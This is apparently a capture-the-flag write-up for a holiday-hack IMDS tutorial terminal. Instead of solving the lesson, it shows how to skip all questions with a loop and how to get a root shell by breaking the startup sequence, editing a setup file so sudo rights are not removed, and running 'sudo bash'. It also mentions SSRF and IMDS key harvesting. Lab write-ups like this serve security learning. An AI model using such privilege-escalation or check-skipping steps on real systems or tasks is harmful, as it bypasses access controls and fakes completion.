Skip to content

IMDS Exploration⚓︎

Elf: Noxious O'Dor
Direct link: imds terminal
Objective: Now Hiring!

Request⚓︎

Noxious O'Dor

Hey, this is the executive restroom. Wasn't that door closed?
I'm Noxious O'Dor. And I've gotta say, I think that Jack Frost is just messed up.
I mean, I'm no expert, but his effort to "win" against Santa by going bigger and bolder seems bad.
You know, I'm having some trouble with this IMDS exploration. I'm hoping you can give me some help in solving it.
If you do, I'll be happy to trade you for some hints on SSRF! I've been studying up on that and have some good ideas on how to attack it!

Solution⚓︎

Welcome message
🎄🎄🎄 Prof. Petabyte here. In this lesson you'll continue to build your cloud asset skills,
🎄🎄🎄 interacting with the Instance Metadata Service (IMDS) using curl.
🎄🎄🎄
🎄🎄🎄 If you get stuck, run 'hint' for assitance.
🎄🎄🎄

This terminal takes you through what IMDS is and how you can interact with the service by going over various sample curl commands. Instead of rehashing the same commands here and calling it a write-up, let's look at some other fun things we can do, like skipping past all the questions to get the achievement or elevating our privileges to root! 🤘

During Prof. Petabyte's lesson you're asked to type next a few times. This command actually works for every single question and so a one-liner like for i in {1..18}; do next; sleep 1; done will award you the achievement with minimal effort.

Getting root

Skipping past all the questions is fun, but getting a root shell is better! 🥳

Start by using Ctrl + c to break out of the startup sequence. If you time it right you'll prevent the bottom pane from fully loading and end up logged in as the init user. In the user's home folder you'll find a tmuxp session configuration file (i.e., mysession.yaml), the top_pane and bottom_pane setuid binaries that are run in each tmux pane, and a questions_answers.json file.

During terminal startup there's an /etc/sudoers file present with an entry for the elfu user. However, as top_pane parses questions_answers.json and loads the data for the first question, it'll execute 2 additional commands, one being sudo rm /etc/sudoers which removes elfu's sudo permissions again.

To get a root shell, open a new tmux window using Ctrl + b c (line 2), kill the old processes (lines 3-5), take ownership of the files so we can edit them (lines 6-9), change the session name in mysession.yaml (line 10), edit questions_answers.json so it doesn't delete /etc/sudoers (line 11), and load mysession.yaml to initialize everything again (line 12). We've now switched to the elfu account but with the /etc/sudoers file still in place, meaning sudo bash will give us our root shell.

Terminal commands
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
# ctrl+c out of the startup sequence
# ctrl+b c to open a new tmux window
ps ax  # list all processes
kill -9 43  # kill the old top pane bash process
kill -9 79  # kill the old bottom pane bash process
cp questions_answers.json questions_answers_copy.json  # create a writable copy
mv -f questions_answers_copy.json questions_answers.json  # rename the file to replace the original
cp mysession.yaml mysession_copy.yaml  # create a writable copy
mv -f mysession_copy.yaml mysession.yaml  # rename the file to replace the original
sed -i 's/ElfU/Elfu2Root/g' mysession.yaml  # edit the session name to Elfu2Root
pico questions_answers.json  # remove the "sudo rm /etc/sudoers" line (e.g., pico, vi)
tmuxp load mysession.yaml  # load the tmux session again
sudo bash  # leverage elfu's sudo permissions

Putting all of the above into practice looks something like this.

Response⚓︎

Noxious O'Dor

Phew! That is something extra! Oh, and you solved the challenge too? Great!
Cloud assets are interesting targets for attackers. Did you know they automatically get IMDS access?
I'm very concerned about the combination of SSRF and IMDS access.
Did you know it's possible to harvest cloud keys through SSRF and IMDS attacks?
Dr. Petabyte told us, "anytime you see URL as an input, test for SSRF."
With an SSRF attack, we can make the server request a URL. This can reveal valuable data!
The AWS documentation for IMDS is interesting reading.